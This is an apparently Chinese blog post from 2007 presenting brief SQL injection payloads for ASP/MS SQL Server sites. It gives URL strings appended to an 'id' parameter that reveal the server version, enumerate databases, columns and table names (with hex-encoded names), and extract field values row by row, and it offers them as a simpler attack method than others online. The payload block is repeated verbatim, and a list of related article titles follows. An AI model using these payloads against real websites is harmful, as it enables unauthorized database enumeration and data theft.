注入的几条简单语句,不用像网上那样复杂
2007-02-15 09:55
197 查看
一、版本
url/1.asp?id=1 and @@VERSION>0
二、跨库
url/1.asp?id=1 and 1=(select db_name(n))
n改成0,1,2,3……就可以跨库了,是不是比网上的简单呢?
三、列名
url/1.asp?id=1 and 1=(select col_name(object_id('表名'),n) '表名'可以换成16进制。像bbsuser=0x6200620073007500730065007200(不可以去掉0)
四、表名字段值
select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('表名1,表名2'))
字段值:
select top 1 列名 from 表名 where 列名 not in (select top n 列名 from 表名)
n改1,2,3,4就可以得库名、列名
url/1.asp?id=1 and @@VERSION>0
二、跨库
url/1.asp?id=1 and 1=(select db_name(n))
n改成0,1,2,3……就可以跨库了,是不是比网上的简单呢?
三、列名
url/1.asp?id=1 and 1=(select col_name(object_id('表名'),n) '表名'可以换成16进制。像bbsuser=0x6200620073007500730065007200(不可以去掉0)
四、表名字段值
select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('表名1,表名2'))
字段值:
select top 1 列名 from 表名 where 列名 not in (select top n 列名 from 表名)
n改1,2,3,4就可以得库名、列名
相关文章推荐
- 注入的几条简单语句,不用像网上那样复杂
- 注入的几条简单语句
- 注入的几条简单语句
- 几条复杂的SQL语句
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- sql 语句实现简单查询和复杂查询
- 简单高效防注入攻击的动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- eclipse转换工作空间的时候需要配置maven等各种配置 现在有一种简单的方法可以不用复杂配置 只配置一次就行
- SQL语句技巧--复杂逻辑的SQL简单实现(1)
- SQL语句技巧--复杂逻辑的SQL简单实现(1)
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单对比几条查询语句的执行时间
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 一个简单与复杂并存的嵌套查询语句
- 如果是能简单解决的问题,就不用想得太复杂了
- SQL语句技巧--复杂逻辑的SQL简单实现(2)
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 如果是能简单解决的问题,就不用想得太复杂了
- 几条简单的MSSQL暴表语句